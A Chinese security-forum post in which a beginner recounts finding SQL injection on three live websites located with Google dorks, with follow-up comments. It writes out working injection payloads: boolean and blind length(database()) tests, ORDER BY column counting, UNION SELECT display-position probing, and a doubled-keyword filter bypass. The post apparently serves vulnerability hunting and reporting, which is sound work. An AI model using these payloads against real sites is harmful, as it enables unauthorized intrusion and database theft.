小白处女贴-纪念萌新第一次挖到漏洞

2218194143   ·   发表于 2021-11-11 22:19:27   ·   实战纪实

1、谷歌语法:inurl:.php?id=

找到一个传参值

直接and 1=1 页面正常
and 1=2 页面报错
可能存在SQL注入

测试发现不能回显
试试盲注:length(database())>0 发现页面正常

试试length(database())=1
………到length(database())=4页面均报错

而length(database())=5 页面正常

可能存在布尔盲注
sqlmap跑一下

测试到此为止

2、
谷歌语法:公司inurl:php?id
and 1=2 页面异常,and 1=1 页面正常 说明存在注入

order by 判断字段数,有25个字段
找显错位:
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25

将2位置换成database(),得到库名

到此为止,提交!

3、谷歌语法:公司inurl:php?id
找到一个站
and 1=1 ,and 1=2 判断是否有注入


页面报错,说明存在注入,用order by 判断字段数,并通过联合查询找回显点
经过测试发现有9个字段,直接union select 1,2,3,4,5,6,7,8,9

发现页面不是想象中的样子,但很明显,我输入的语句拼接到了数据库中
页面显示我的语法有错误,观察发现,它把我输入的语句进行了过滤

我输入的union select 莫名其妙的消失了,估计它给我过滤了

将union select换成ununionion selselectect
成功执行,找到显错位

将4位置换成database(),得到库名

测试到此为止,提交!!!

用户名金币积分时间理由
Track-劲夫 10.00 0 2021-12-20 16:04:08 一个受益终生的帖子~~

打赏我,让我更有动力~

5 Reply   |  Until 5天前 | 397 View

Track-劲夫
发表于 27天前

加油,希望你可以挖出其他类型的漏洞

评论列表

  • 加载数据中...

编写评论内容

nocircle
发表于 26天前

似曾相识的站点

评论列表

  • 加载数据中...

编写评论内容

dlse
发表于 26天前

为啥将union select换成ununionion selselectect就能执行成功呢

评论列表

  • 加载数据中...

编写评论内容

没勇气先生
发表于 26天前

双写绕过,文件上传有讲

评论列表

  • 加载数据中...

编写评论内容

武当山大黄狗
发表于 5天前

我擦 这种站我都找到过 但是把双写绕过当饭吃了 都是盲注

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.